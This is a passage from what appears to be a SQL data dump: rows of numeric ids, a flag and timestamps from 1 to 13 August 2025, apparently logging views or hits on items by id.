19:08:35'),(89211,3083,1,'2025-08-01','2025-08-01 19:11:08'),(89212,1582,1,'2025-08-01','2025-08-01 19:46:25'),(89213,5461,1,'2025-08-01','2025-08-01 20:52:02'),(89214,3282,1,'2025-08-01','2025-08-01 20:58:49'),(89215,72,1,'2025-08-01','2025-08-01 21:09:14'),(89216,87,1,'2025-08-01','2025-08-01 21:17:12'),(89217,5449,1,'2025-08-01','2025-08-01 21:45:43'),(89218,80,1,'2025-08-01','2025-08-01 21:51:08'),(89219,5502,1,'2025-08-01','2025-08-01 22:00:29'),(89220,3781,1,'2025-08-01','2025-08-01 22:24:23'),(89221,5271,1,'2025-08-01','2025-08-01 22:33:34'),(89222,3710,1,'2025-08-01','2025-08-01 22:42:18'),(89223,5526,1,'2025-08-01','2025-08-01 23:14:06'),(89224,4980,1,'2025-08-01','2025-08-01 23:57:22'),(89225,5356,1,'2025-08-02','2025-08-02 00:48:08'),(89226,482,1,'2025-08-02','2025-08-02 00:50:12'),(89227,4950,1,'2025-08-02','2025-08-02 00:52:16'),(89228,4941,1,'2025-08-02','2025-08-02 00:59:53'),(89229,3051,1,'2025-08-02','2025-08-02 01:11:13'),(89230,4830,1,'2025-08-02','2025-08-02 01:23:13'),(89231,4966,1,'2025-08-02','2025-08-02 01:48:04'),(89232,5415,1,'2025-08-02','2025-08-02 03:49:54'),(89233,4729,1,'2025-08-02','2025-08-02 03:50:03'),(89234,4963,1,'2025-08-02','2025-08-02 04:57:36'),(89235,72,1,'2025-08-02','2025-08-02 05:07:55'),(89236,87,1,'2025-08-02','2025-08-02 05:15:55'),(89237,5397,1,'2025-08-02','2025-08-02 06:51:18'),(89238,5464,1,'2025-08-02','2025-08-02 09:27:03'),(89239,4983,1,'2025-08-02','2025-08-02 11:03:22'),(89240,5484,1,'2025-08-02','2025-08-02 11:22:20'),(89241,4966,1,'2025-08-02','2025-08-02 12:22:57'),(89242,2991,1,'2025-08-02','2025-08-02 12:42:10'),(89243,72,1,'2025-08-02','2025-08-02 13:07:12'),(89244,87,1,'2025-08-02','2025-08-02 13:15:18'),(89245,3175,1,'2025-08-02','2025-08-02 14:20:57'),(89246,91,1,'2025-08-02','2025-08-02 15:23:02'),(89247,5495,1,'2025-08-02','2025-08-02 15:39:24'),(89248,3498,1,'2025-08-02','2025-08-02 15:48:07'),(89249,1877,1,'2025-08-02','2025-08-02 16:06:18'),(89250,1749,1,'2025-08-02','2025-08-02 16:33:18'),(89251,5054,1,'2025-08-02','2025-08-02 16:43:06'),(89252,4950,1,'2025-08-02','2025-08-02 19:59:27'),(89253,4950,1,'2025-08-02','2025-08-02 19:59:33'),(89254,5507,1,'2025-08-02','2025-08-02 21:02:26'),(89255,72,1,'2025-08-02','2025-08-02 21:05:15'),(89256,87,1,'2025-08-02','2025-08-02 21:13:15'),(89257,1718,1,'2025-08-02','2025-08-02 21:38:45'),(89258,4608,1,'2025-08-02','2025-08-02 21:42:01'),(89259,2804,1,'2025-08-02','2025-08-02 21:54:07'),(89260,2804,1,'2025-08-02','2025-08-02 21:54:09'),(89261,2411,1,'2025-08-03','2025-08-03 01:15:22'),(89262,4941,1,'2025-08-03','2025-08-03 01:57:21'),(89263,4950,1,'2025-08-03','2025-08-03 03:06:40'),(89264,72,1,'2025-08-03','2025-08-03 05:05:14'),(89265,87,1,'2025-08-03','2025-08-03 05:13:07'),(89266,1614,1,'2025-08-03','2025-08-03 06:16:24'),(89267,4950,1,'2025-08-03','2025-08-03 06:36:55'),(89268,4950,1,'2025-08-03','2025-08-03 06:51:42'),(89269,1745,1,'2025-08-03','2025-08-03 09:39:27'),(89270,72,1,'2025-08-03','2025-08-03 13:03:10'),(89271,4301,1,'2025-08-03','2025-08-03 13:08:17'),(89272,87,1,'2025-08-03','2025-08-03 13:11:09'),(89273,5530,1,'2025-08-03','2025-08-03 13:14:38'),(89274,4950,1,'2025-08-03','2025-08-03 13:40:02'),(89275,1590,1,'2025-08-03','2025-08-03 13:55:24'),(89276,91,1,'2025-08-03','2025-08-03 15:27:31'),(89277,5515,1,'2025-08-03','2025-08-03 15:59:19'),(89278,474,1,'2025-08-03','2025-08-03 16:03:45'),(89279,5512,1,'2025-08-03','2025-08-03 16:07:42'),(89280,5492,1,'2025-08-03','2025-08-03 16:12:34'),(89281,91,1,'2025-08-03','2025-08-03 16:23:42'),(89282,91,1,'2025-08-03','2025-08-03 16:23:52'),(89283,5489,1,'2025-08-03','2025-08-03 16:24:11'),(89284,2748,1,'2025-08-03','2025-08-03 16:35:58'),(89285,72,1,'2025-08-03','2025-08-03 16:44:58'),(89286,5536,1,'2025-08-03','2025-08-03 16:45:34'),(89287,72,1,'2025-08-03','2025-08-03 16:54:12'),(89288,5530,1,'2025-08-03','2025-08-03 16:54:49'),(89289,72,1,'2025-08-03','2025-08-03 16:59:30'),(89290,5522,1,'2025-08-03','2025-08-03 17:00:52'),(89291,5292,1,'2025-08-03','2025-08-03 17:07:43'),(89292,3781,1,'2025-08-03','2025-08-03 17:55:46'),(89293,4835,1,'2025-08-03','2025-08-03 19:03:35'),(89294,87,1,'2025-08-03','2025-08-03 21:10:01'),(89295,5545,1,'2025-08-03','2025-08-03 21:28:45'),(89296,5549,1,'2025-08-03','2025-08-03 21:30:41'),(89297,91,1,'2025-08-03','2025-08-03 21:36:37'),(89298,80,1,'2025-08-04','2025-08-04 00:06:58'),(89299,5295,1,'2025-08-04','2025-08-04 01:04:31'),(89300,1598,1,'2025-08-04','2025-08-04 05:14:58'),(89301,5545,1,'2025-08-04','2025-08-04 06:14:43'),(89302,3273,1,'2025-08-04','2025-08-04 07:05:30'),(89303,1604,1,'2025-08-04','2025-08-04 07:29:57'),(89304,68,1,'2025-08-04','2025-08-04 07:30:35'),(89305,68,1,'2025-08-04','2025-08-04 07:30:51'),(89306,1586,1,'2025-08-04','2025-08-04 09:17:02'),(89307,2395,1,'2025-08-04','2025-08-04 09:52:37'),(89308,4587,1,'2025-08-04','2025-08-04 10:26:06'),(89309,108,1,'2025-08-04','2025-08-04 10:38:04'),(89310,80,1,'2025-08-04','2025-08-04 13:14:06'),(89311,80,1,'2025-08-04','2025-08-04 13:14:34'),(89312,5467,1,'2025-08-04','2025-08-04 14:51:01'),(89313,5397,1,'2025-08-04','2025-08-04 15:14:14'),(89314,4980,1,'2025-08-04','2025-08-04 15:15:58'),(89315,5346,1,'2025-08-04','2025-08-04 15:20:44'),(89316,5289,1,'2025-08-04','2025-08-04 16:06:17'),(89317,4827,1,'2025-08-04','2025-08-04 16:12:02'),(89318,91,1,'2025-08-04','2025-08-04 16:14:45'),(89319,1778,1,'2025-08-04','2025-08-04 16:20:12'),(89320,3079,1,'2025-08-04','2025-08-04 16:54:23'),(89321,5539,1,'2025-08-04','2025-08-04 16:57:35'),(89322,3079,1,'2025-08-04','2025-08-04 16:57:42'),(89323,72,1,'2025-08-04','2025-08-04 16:58:08'),(89324,5553,1,'2025-08-04','2025-08-04 16:58:31'),(89325,5553,1,'2025-08-04','2025-08-04 17:04:29'),(89326,5553,1,'2025-08-04','2025-08-04 17:32:28'),(89327,5553,1,'2025-08-04','2025-08-04 17:37:21'),(89328,5553,1,'2025-08-04','2025-08-04 17:40:08'),(89329,5553,1,'2025-08-04','2025-08-04 17:48:15'),(89330,5522,1,'2025-08-04','2025-08-04 18:14:11'),(89331,5433,1,'2025-08-04','2025-08-04 18:19:05'),(89332,4424,1,'2025-08-04','2025-08-04 18:42:26'),(89333,5449,1,'2025-08-04','2025-08-04 19:23:10'),(89334,4382,1,'2025-08-04','2025-08-04 20:34:34'),(89335,5553,1,'2025-08-04','2025-08-04 20:50:53'),(89336,91,1,'2025-08-04','2025-08-04 21:22:21'),(89337,5415,1,'2025-08-04','2025-08-04 21:25:18'),(89338,84,1,'2025-08-04','2025-08-04 21:26:21'),(89339,87,1,'2025-08-04','2025-08-04 21:26:24'),(89340,89,1,'2025-08-04','2025-08-04 21:26:26'),(89341,4930,1,'2025-08-04','2025-08-04 21:26:30'),(89342,5259,1,'2025-08-04','2025-08-04 22:26:43'),(89343,5259,1,'2025-08-04','2025-08-04 22:26:46'),(89344,91,1,'2025-08-04','2025-08-04 22:27:45'),(89345,5264,1,'2025-08-04','2025-08-04 22:28:15'),(89346,5264,1,'2025-08-04','2025-08-04 22:28:16'),(89347,91,1,'2025-08-04','2025-08-04 22:29:05'),(89348,5157,1,'2025-08-04','2025-08-04 22:30:47'),(89349,5153,1,'2025-08-04','2025-08-04 22:32:28'),(89350,5146,1,'2025-08-04','2025-08-04 22:35:32'),(89351,5146,1,'2025-08-04','2025-08-04 22:35:34'),(89352,91,1,'2025-08-04','2025-08-04 22:36:28'),(89353,5140,1,'2025-08-04','2025-08-04 22:36:45'),(89354,5067,1,'2025-08-04','2025-08-04 22:39:03'),(89355,5067,1,'2025-08-04','2025-08-04 22:39:04'),(89356,91,1,'2025-08-04','2025-08-04 22:39:48'),(89357,4874,1,'2025-08-04','2025-08-04 22:44:18'),(89358,91,1,'2025-08-04','2025-08-04 22:44:52'),(89359,4802,1,'2025-08-04','2025-08-04 22:46:43'),(89360,91,1,'2025-08-04','2025-08-04 22:47:39'),(89361,5472,1,'2025-08-04','2025-08-04 22:49:54'),(89362,91,1,'2025-08-04','2025-08-04 22:50:56'),(89363,5467,1,'2025-08-04','2025-08-04 22:52:45'),(89364,4870,1,'2025-08-04','2025-08-04 22:55:18'),(89365,91,1,'2025-08-04','2025-08-04 22:57:37'),(89366,4866,1,'2025-08-04','2025-08-04 22:59:42'),(89367,4862,1,'2025-08-04','2025-08-04 23:00:54'),(89368,91,1,'2025-08-04','2025-08-04 23:01:28'),(89369,5553,1,'2025-08-04','2025-08-04 23:02:13'),(89370,2411,1,'2025-08-05','2025-08-05 02:40:55'),(89371,4950,1,'2025-08-05','2025-08-05 10:41:46'),(89372,4944,1,'2025-08-05','2025-08-05 10:43:48'),(89373,4950,1,'2025-08-05','2025-08-05 12:03:33'),(89374,4950,1,'2025-08-05','2025-08-05 12:05:27'),(89375,1745,1,'2025-08-05','2025-08-05 13:15:37'),(89376,4944,1,'2025-08-05','2025-08-05 13:33:44'),(89377,1778,1,'2025-08-05','2025-08-05 15:58:35'),(89378,76,1,'2025-08-05','2025-08-05 16:09:23'),(89379,91,1,'2025-08-05','2025-08-05 16:28:54'),(89380,1870,1,'2025-08-05','2025-08-05 17:53:59'),(89381,1877,1,'2025-08-05','2025-08-05 17:57:07'),(89382,4612,1,'2025-08-05','2025-08-05 18:00:05'),(89383,4420,1,'2025-08-05','2025-08-05 19:22:28'),(89384,2457,1,'2025-08-05','2025-08-05 19:38:34'),(89385,5557,1,'2025-08-05','2025-08-05 20:17:46'),(89386,5557,1,'2025-08-05','2025-08-05 20:21:22'),(89387,5557,1,'2025-08-05','2025-08-05 20:30:17'),(89388,5557,1,'2025-08-05','2025-08-05 21:08:58'),(89389,5557,1,'2025-08-05','2025-08-05 21:28:38'),(89390,1722,1,'2025-08-05','2025-08-05 22:00:04'),(89391,3180,1,'2025-08-05','2025-08-05 22:05:51'),(89392,3092,1,'2025-08-05','2025-08-05 22:38:17'),(89393,1586,1,'2025-08-05','2025-08-05 22:59:03'),(89394,2775,1,'2025-08-05','2025-08-05 23:12:39'),(89395,2775,1,'2025-08-05','2025-08-05 23:12:46'),(89396,5140,1,'2025-08-05','2025-08-05 23:30:29'),(89397,5397,1,'2025-08-05','2025-08-05 23:35:33'),(89398,3297,1,'2025-08-05','2025-08-05 23:39:07'),(89399,91,1,'2025-08-05','2025-08-05 23:52:45'),(89400,3079,1,'2025-08-06','2025-08-06 02:12:23'),(89401,4837,1,'2025-08-06','2025-08-06 04:19:12'),(89402,5449,1,'2025-08-06','2025-08-06 09:14:33'),(89403,4612,1,'2025-08-06','2025-08-06 09:58:48'),(89404,2993,1,'2025-08-06','2025-08-06 10:29:41'),(89405,3781,1,'2025-08-06','2025-08-06 10:48:27'),(89406,1586,1,'2025-08-06','2025-08-06 10:48:50'),(89407,1724,1,'2025-08-06','2025-08-06 11:34:32'),(89408,3706,1,'2025-08-06','2025-08-06 12:20:28'),(89409,80,1,'2025-08-06','2025-08-06 13:49:13'),(89410,80,1,'2025-08-06','2025-08-06 13:50:46'),(89411,80,1,'2025-08-06','2025-08-06 13:51:45'),(89412,80,1,'2025-08-06','2025-08-06 13:52:47'),(89413,80,1,'2025-08-06','2025-08-06 13:53:08'),(89414,4960,1,'2025-08-06','2025-08-06 14:11:21'),(89415,5553,1,'2025-08-06','2025-08-06 15:01:14'),(89416,4323,1,'2025-08-06','2025-08-06 15:16:31'),(89417,108,1,'2025-08-06','2025-08-06 15:49:12'),(89418,4950,1,'2025-08-06','2025-08-06 16:19:16'),(89419,68,1,'2025-08-06','2025-08-06 16:19:36'),(89420,108,1,'2025-08-06','2025-08-06 16:32:01'),(89421,91,1,'2025-08-06','2025-08-06 17:03:34'),(89422,5522,1,'2025-08-06','2025-08-06 17:08:26'),(89423,4944,1,'2025-08-06','2025-08-06 17:36:31'),(89424,2297,1,'2025-08-06','2025-08-06 18:21:28'),(89425,72,1,'2025-08-06','2025-08-06 18:24:39'),(89426,4950,1,'2025-08-06','2025-08-06 18:40:47'),(89427,4326,1,'2025-08-06','2025-08-06 19:23:27'),(89428,5553,1,'2025-08-06','2025-08-06 20:08:05'),(89429,1703,1,'2025-08-06','2025-08-06 21:30:50'),(89430,5561,1,'2025-08-06','2025-08-06 22:06:09'),(89431,5561,1,'2025-08-06','2025-08-06 22:06:11'),(89432,5545,1,'2025-08-06','2025-08-06 22:26:38'),(89433,4416,1,'2025-08-06','2025-08-06 22:41:42'),(89434,4573,1,'2025-08-07','2025-08-07 00:25:47'),(89435,5489,1,'2025-08-07','2025-08-07 01:54:16'),(89436,5346,1,'2025-08-07','2025-08-07 02:10:37'),(89437,89,1,'2025-08-07','2025-08-07 04:53:46'),(89438,5557,1,'2025-08-07','2025-08-07 06:16:42'),(89439,4950,1,'2025-08-07','2025-08-07 06:56:56'),(89440,76,1,'2025-08-07','2025-08-07 07:00:07'),(89441,4950,1,'2025-08-07','2025-08-07 07:04:17'),(89442,5561,1,'2025-08-07','2025-08-07 07:11:43'),(89443,80,1,'2025-08-07','2025-08-07 07:12:26'),(89444,80,1,'2025-08-07','2025-08-07 07:25:12'),(89445,2420,1,'2025-08-07','2025-08-07 07:26:28'),(89446,80,1,'2025-08-07','2025-08-07 07:32:04'),(89447,2419,1,'2025-08-07','2025-08-07 07:37:44'),(89448,5561,1,'2025-08-07','2025-08-07 07:48:58'),(89449,1582,1,'2025-08-07','2025-08-07 08:45:12'),(89450,5561,1,'2025-08-07','2025-08-07 10:22:00'),(89451,3226,1,'2025-08-07','2025-08-07 10:24:12'),(89452,4520,1,'2025-08-07','2025-08-07 11:36:25'),(89453,4966,1,'2025-08-07','2025-08-07 12:08:20'),(89454,5119,1,'2025-08-07','2025-08-07 12:21:04'),(89455,5264,1,'2025-08-07','2025-08-07 14:08:20'),(89456,5295,1,'2025-08-07','2025-08-07 14:26:26'),(89457,5449,1,'2025-08-07','2025-08-07 14:31:21'),(89458,4608,1,'2025-08-07','2025-08-07 15:04:46'),(89459,87,1,'2025-08-07','2025-08-07 15:23:51'),(89460,4950,1,'2025-08-07','2025-08-07 15:27:15'),(89461,68,1,'2025-08-07','2025-08-07 15:28:16'),(89462,4950,1,'2025-08-07','2025-08-07 16:21:32'),(89463,4944,1,'2025-08-07','2025-08-07 17:23:51'),(89464,5549,1,'2025-08-07','2025-08-07 17:29:48'),(89465,91,1,'2025-08-07','2025-08-07 17:31:19'),(89466,1612,1,'2025-08-07','2025-08-07 18:34:38'),(89467,4950,1,'2025-08-07','2025-08-07 19:02:21'),(89468,4950,1,'2025-08-07','2025-08-07 19:05:52'),(89469,5457,1,'2025-08-07','2025-08-07 19:44:02'),(89470,76,1,'2025-08-07','2025-08-07 19:46:49'),(89471,4950,1,'2025-08-07','2025-08-07 19:53:09'),(89472,1726,1,'2025-08-07','2025-08-07 20:12:52'),(89473,4400,1,'2025-08-07','2025-08-07 21:29:44'),(89474,5441,1,'2025-08-07','2025-08-07 22:15:24'),(89475,4966,1,'2025-08-07','2025-08-07 23:12:29'),(89476,4950,1,'2025-08-07','2025-08-07 23:35:39'),(89477,4608,1,'2025-08-08','2025-08-08 02:21:37'),(89478,4950,1,'2025-08-08','2025-08-08 02:40:19'),(89479,72,1,'2025-08-08','2025-08-08 04:11:46'),(89480,5545,1,'2025-08-08','2025-08-08 04:12:00'),(89481,5545,1,'2025-08-08','2025-08-08 04:12:03'),(89482,5557,1,'2025-08-08','2025-08-08 04:12:04'),(89483,5553,1,'2025-08-08','2025-08-08 04:12:05'),(89484,5557,1,'2025-08-08','2025-08-08 04:12:06'),(89485,5553,1,'2025-08-08','2025-08-08 04:12:07'),(89486,5549,1,'2025-08-08','2025-08-08 04:12:08'),(89487,5549,1,'2025-08-08','2025-08-08 04:12:11'),(89488,4944,1,'2025-08-08','2025-08-08 04:28:29'),(89489,5515,1,'2025-08-08','2025-08-08 08:47:42'),(89490,5561,1,'2025-08-08','2025-08-08 08:47:42'),(89491,5515,1,'2025-08-08','2025-08-08 08:52:08'),(89492,5561,1,'2025-08-08','2025-08-08 08:52:08'),(89493,4950,1,'2025-08-08','2025-08-08 10:17:39'),(89494,4950,1,'2025-08-08','2025-08-08 12:29:36'),(89495,80,1,'2025-08-08','2025-08-08 12:31:05'),(89496,1703,1,'2025-08-08','2025-08-08 14:53:48'),(89497,72,1,'2025-08-08','2025-08-08 15:15:39'),(89498,5415,1,'2025-08-08','2025-08-08 15:56:55'),(89499,3430,1,'2025-08-08','2025-08-08 15:59:36'),(89500,1590,1,'2025-08-08','2025-08-08 16:17:35'),(89501,1701,1,'2025-08-08','2025-08-08 17:38:07'),(89502,1703,1,'2025-08-08','2025-08-08 17:51:40'),(89503,91,1,'2025-08-08','2025-08-08 18:20:34'),(89504,5415,1,'2025-08-08','2025-08-08 19:41:55'),(89505,5415,1,'2025-08-08','2025-08-08 20:13:58'),(89506,467,1,'2025-08-08','2025-08-08 20:20:03'),(89507,5050,1,'2025-08-08','2025-08-08 20:40:22'),(89508,5307,1,'2025-08-08','2025-08-08 21:14:35'),(89509,3781,1,'2025-08-08','2025-08-08 22:19:01'),(89510,84,1,'2025-08-08','2025-08-08 22:19:08'),(89511,5062,1,'2025-08-08','2025-08-08 22:55:52'),(89512,68,1,'2025-08-08','2025-08-08 23:10:34'),(89513,4612,1,'2025-08-09','2025-08-09 00:37:46'),(89514,1703,1,'2025-08-09','2025-08-09 01:32:23'),(89515,72,1,'2025-08-09','2025-08-09 02:37:24'),(89516,570,1,'2025-08-09','2025-08-09 02:38:56'),(89517,3691,1,'2025-08-09','2025-08-09 03:16:51'),(89518,89,1,'2025-08-09','2025-08-09 03:43:13'),(89519,5397,1,'2025-08-09','2025-08-09 04:12:34'),(89520,1582,1,'2025-08-09','2025-08-09 04:23:48'),(89521,5163,1,'2025-08-09','2025-08-09 07:08:43'),(89522,74,1,'2025-08-09','2025-08-09 07:20:00'),(89523,1776,1,'2025-08-09','2025-08-09 07:26:39'),(89524,5433,1,'2025-08-09','2025-08-09 08:02:15'),(89525,72,1,'2025-08-09','2025-08-09 10:43:03'),(89526,3005,1,'2025-08-09','2025-08-09 12:34:26'),(89527,1604,1,'2025-08-09','2025-08-09 14:57:10'),(89528,76,1,'2025-08-09','2025-08-09 15:30:14'),(89529,1604,1,'2025-08-09','2025-08-09 16:51:46'),(89530,91,1,'2025-08-09','2025-08-09 16:53:03'),(89531,5415,1,'2025-08-09','2025-08-09 16:55:30'),(89532,5415,1,'2025-08-09','2025-08-09 16:55:32'),(89533,1604,1,'2025-08-09','2025-08-09 17:01:12'),(89534,1728,1,'2025-08-09','2025-08-09 17:06:09'),(89535,1604,1,'2025-08-09','2025-08-09 17:28:44'),(89536,72,1,'2025-08-09','2025-08-09 18:43:12'),(89537,91,1,'2025-08-09','2025-08-09 18:52:53'),(89538,2159,1,'2025-08-09','2025-08-09 19:01:43'),(89539,5549,1,'2025-08-09','2025-08-09 19:05:50'),(89540,1544,1,'2025-08-09','2025-08-09 19:21:27'),(89541,3664,1,'2025-08-09','2025-08-09 20:03:24'),(89542,5409,1,'2025-08-09','2025-08-09 20:24:37'),(89543,4950,1,'2025-08-09','2025-08-09 20:50:30'),(89544,3313,1,'2025-08-09','2025-08-09 21:12:27'),(89545,472,1,'2025-08-10','2025-08-10 00:19:59'),(89546,3030,1,'2025-08-10','2025-08-10 01:01:59'),(89547,2813,1,'2025-08-10','2025-08-10 01:46:33'),(89548,5464,1,'2025-08-10','2025-08-10 02:05:04'),(89549,5264,1,'2025-08-10','2025-08-10 02:05:38'),(89550,4950,1,'2025-08-10','2025-08-10 02:35:31'),(89551,1604,1,'2025-08-10','2025-08-10 03:18:11'),(89552,4457,1,'2025-08-10','2025-08-10 05:10:09'),(89553,5553,1,'2025-08-10','2025-08-10 07:16:46'),(89554,5545,1,'2025-08-10','2025-08-10 07:17:28'),(89555,4930,1,'2025-08-10','2025-08-10 07:25:43'),(89556,4950,1,'2025-08-10','2025-08-10 07:33:59'),(89557,1586,1,'2025-08-10','2025-08-10 07:37:08'),(89558,2617,1,'2025-08-10','2025-08-10 07:56:52'),(89559,1766,1,'2025-08-10','2025-08-10 09:41:43'),(89560,72,1,'2025-08-10','2025-08-10 10:45:28'),(89561,4688,1,'2025-08-10','2025-08-10 12:28:34'),(89562,91,1,'2025-08-10','2025-08-10 18:55:37'),(89563,5276,1,'2025-08-10','2025-08-10 18:57:12'),(89564,2813,1,'2025-08-10','2025-08-10 19:16:54'),(89565,467,1,'2025-08-10','2025-08-10 19:46:38'),(89566,5530,1,'2025-08-10','2025-08-10 20:14:53'),(89567,5276,1,'2025-08-10','2025-08-10 20:17:29'),(89568,4440,1,'2025-08-10','2025-08-10 20:43:56'),(89569,2152,1,'2025-08-10','2025-08-10 21:27:59'),(89570,1715,1,'2025-08-10','2025-08-10 21:34:28'),(89571,2063,1,'2025-08-10','2025-08-10 21:39:47'),(89572,3263,1,'2025-08-10','2025-08-10 21:43:04'),(89573,1718,1,'2025-08-10','2025-08-10 22:41:06'),(89574,4950,1,'2025-08-10','2025-08-10 23:08:02'),(89575,4950,1,'2025-08-10','2025-08-10 23:09:57'),(89576,72,1,'2025-08-10','2025-08-10 23:17:47'),(89577,5346,1,'2025-08-10','2025-08-10 23:41:30'),(89578,5304,1,'2025-08-11','2025-08-11 01:43:37'),(89579,5492,1,'2025-08-11','2025-08-11 06:44:14'),(89580,3777,1,'2025-08-11','2025-08-11 07:46:21'),(89581,72,1,'2025-08-11','2025-08-11 08:07:45'),(89582,5567,1,'2025-08-11','2025-08-11 08:17:06'),(89583,5567,1,'2025-08-11','2025-08-11 08:41:50'),(89584,5567,1,'2025-08-11','2025-08-11 08:44:43'),(89585,5567,1,'2025-08-11','2025-08-11 08:49:58'),(89586,5567,1,'2025-08-11','2025-08-11 09:05:26'),(89587,5567,1,'2025-08-11','2025-08-11 09:06:44'),(89588,5567,1,'2025-08-11','2025-08-11 09:14:45'),(89589,5512,1,'2025-08-11','2025-08-11 09:17:03'),(89590,5567,1,'2025-08-11','2025-08-11 09:33:12'),(89591,5549,1,'2025-08-11','2025-08-11 09:50:59'),(89592,4950,1,'2025-08-11','2025-08-11 10:06:18'),(89593,5567,1,'2025-08-11','2025-08-11 11:52:10'),(89594,4950,1,'2025-08-11','2025-08-11 12:10:13'),(89595,80,1,'2025-08-11','2025-08-11 12:10:24'),(89596,4301,1,'2025-08-11','2025-08-11 12:26:09'),(89597,89,1,'2025-08-11','2025-08-11 12:41:40'),(89598,1608,1,'2025-08-11','2025-08-11 12:42:15'),(89599,4301,1,'2025-08-11','2025-08-11 13:09:43'),(89600,4950,1,'2025-08-11','2025-08-11 13:37:50'),(89601,91,1,'2025-08-11','2025-08-11 14:33:36'),(89602,91,1,'2025-08-11','2025-08-11 14:37:56'),(89603,570,1,'2025-08-11','2025-08-11 15:04:29'),(89604,570,1,'2025-08-11','2025-08-11 15:04:29'),(89605,5397,1,'2025-08-11','2025-08-11 15:49:34'),(89606,3781,1,'2025-08-11','2025-08-11 16:16:02'),(89607,3781,1,'2025-08-11','2025-08-11 16:42:51'),(89608,4950,1,'2025-08-11','2025-08-11 17:33:18'),(89609,4966,1,'2025-08-11','2025-08-11 17:57:45'),(89610,76,1,'2025-08-11','2025-08-11 17:58:04'),(89611,3781,1,'2025-08-11','2025-08-11 18:01:06'),(89612,4950,1,'2025-08-11','2025-08-11 18:40:20'),(89613,91,1,'2025-08-11','2025-08-11 19:12:14'),(89614,5567,1,'2025-08-11','2025-08-11 19:33:36'),(89615,5567,1,'2025-08-11','2025-08-11 19:38:44'),(89616,1709,1,'2025-08-11','2025-08-11 20:22:54'),(89617,72,1,'2025-08-11','2025-08-11 20:33:54'),(89618,5567,1,'2025-08-11','2025-08-11 20:54:57'),(89619,5567,1,'2025-08-11','2025-08-11 21:31:04'),(89620,5567,1,'2025-08-11','2025-08-11 22:13:53'),(89621,5489,1,'2025-08-11','2025-08-11 22:40:40'),(89622,5567,1,'2025-08-11','2025-08-11 22:52:09'),(89623,5489,1,'2025-08-11','2025-08-11 23:08:50'),(89624,5561,1,'2025-08-11','2025-08-11 23:35:39'),(89625,4950,1,'2025-08-11','2025-08-11 23:46:23'),(89626,4950,1,'2025-08-11','2025-08-11 23:57:55'),(89627,4960,1,'2025-08-12','2025-08-12 01:32:17'),(89628,4842,1,'2025-08-12','2025-08-12 03:12:21'),(89629,4416,1,'2025-08-12','2025-08-12 03:13:37'),(89630,4639,1,'2025-08-12','2025-08-12 03:13:43'),(89631,4960,1,'2025-08-12','2025-08-12 03:25:45'),(89632,72,1,'2025-08-12','2025-08-12 03:35:56'),(89633,72,1,'2025-08-12','2025-08-12 03:36:32'),(89634,72,1,'2025-08-12','2025-08-12 03:37:19'),(89635,72,1,'2025-08-12','2025-08-12 03:39:04'),(89636,72,1,'2025-08-12','2025-08-12 03:40:23'),(89637,4966,1,'2025-08-12','2025-08-12 04:32:04'),(89638,5346,1,'2025-08-12','2025-08-12 06:27:40'),(89639,72,1,'2025-08-12','2025-08-12 07:09:47'),(89640,5406,1,'2025-08-12','2025-08-12 08:22:00'),(89641,1586,1,'2025-08-12','2025-08-12 08:23:05'),(89642,1586,1,'2025-08-12','2025-08-12 08:23:08'),(89643,5467,1,'2025-08-12','2025-08-12 08:39:12'),(89644,5526,1,'2025-08-12','2025-08-12 08:57:11'),(89645,3479,1,'2025-08-12','2025-08-12 09:41:55'),(89646,4950,1,'2025-08-12','2025-08-12 09:55:02'),(89647,2395,1,'2025-08-12','2025-08-12 10:16:46'),(89648,80,1,'2025-08-12','2025-08-12 10:17:05'),(89649,2395,1,'2025-08-12','2025-08-12 10:17:24'),(89650,5567,1,'2025-08-12','2025-08-12 10:21:00'),(89651,3742,1,'2025-08-12','2025-08-12 10:31:48'),(89652,5409,1,'2025-08-12','2025-08-12 11:01:18'),(89653,4960,1,'2025-08-12','2025-08-12 12:37:33'),(89654,1728,1,'2025-08-12','2025-08-12 12:43:47'),(89655,4950,1,'2025-08-12','2025-08-12 12:46:07'),(89656,5545,1,'2025-08-12','2025-08-12 12:53:21'),(89657,5163,1,'2025-08-12','2025-08-12 13:12:04'),(89658,5163,1,'2025-08-12','2025-08-12 13:12:05'),(89659,1614,1,'2025-08-12','2025-08-12 14:19:50'),(89660,1614,1,'2025-08-12','2025-08-12 14:19:57'),(89661,5515,1,'2025-08-12','2025-08-12 15:49:08'),(89662,4883,1,'2025-08-12','2025-08-12 16:53:18'),(89663,5515,1,'2025-08-12','2025-08-12 17:02:34'),(89664,72,1,'2025-08-12','2025-08-12 17:31:06'),(89665,91,1,'2025-08-12','2025-08-12 19:15:25'),(89666,91,1,'2025-08-12','2025-08-12 19:36:42'),(89667,87,1,'2025-08-12','2025-08-12 19:49:41'),(89668,68,1,'2025-08-12','2025-08-12 19:50:19'),(89669,2395,1,'2025-08-12','2025-08-12 21:37:04'),(89670,91,1,'2025-08-12','2025-08-12 22:11:21'),(89671,5109,1,'2025-08-12','2025-08-12 22:30:39'),(89672,4591,1,'2025-08-12','2025-08-12 22:55:45'),(89673,4950,1,'2025-08-13','2025-08-13 02:14:31'),(89674,68,1,'2025-08-13','2025-08-13 02:15:48'),(89675,1870,1,'2025-08-13','2025-08-13 03:05:14'),(89676,5526,1,'2025-08-13','2025-08-13 03:06:34'),(89677,5436,1,'2025-08-13','2025-08-13 04:05:35'),(89678,72,1,'2025-08-13','2025-08-13 04:19:36'),(89679,5420,1,'2025-08-13','2025-08-13 07:54:07'),(89680,5567,1,'2025-08-13','2025-08-13 08:48:05'),(89681,2410,1,'2025-08-13','2025-08-13 10:48:20'),(89682,2411,1,'2025-08-13','2025-08-13 10:48:38'),(89683,2419,1,'2025-08-13','2025-08-13 10:48:52'),(89684,2420,1,'2025-08-13','2025-08-13 10:49:05'),(89685,2410,1,'2025-08-13','2025-08-13 10:49:30'),(89686,1582,1,'2025-08-13','2025-08-13 10:55:37'),(89687,5134,1,'2025-08-13','2025-08-13 11:24:25'),(89688,5128,1,'2025-08-13','2025-08-13 12:54:28'),(89689,74,1,'2025-08-13','2025-08-13 13:14:20'),(89690,91,1,'2025-08-13','2025-08-13 13:34:04'),(89691,5378,1,'2025-08-13','2025-08-13 13:34:24'),(89692,3259,1,'2025-08-13','2025-08-13 13:41:46'),(89693,4950,1,'2025-08-13','2025-08-13 13:49:40'),(89694,5522,1,'2025-08-13','2025-08-13 13:59:09'),(89695,5346,1,'2025-08-13','2025-08-13 14:41:41'),(89696,3083,1,'2025-08-13','2025-08-13 14:52:00'),(89697,1582,1,'2025-08-13','2025-08-13 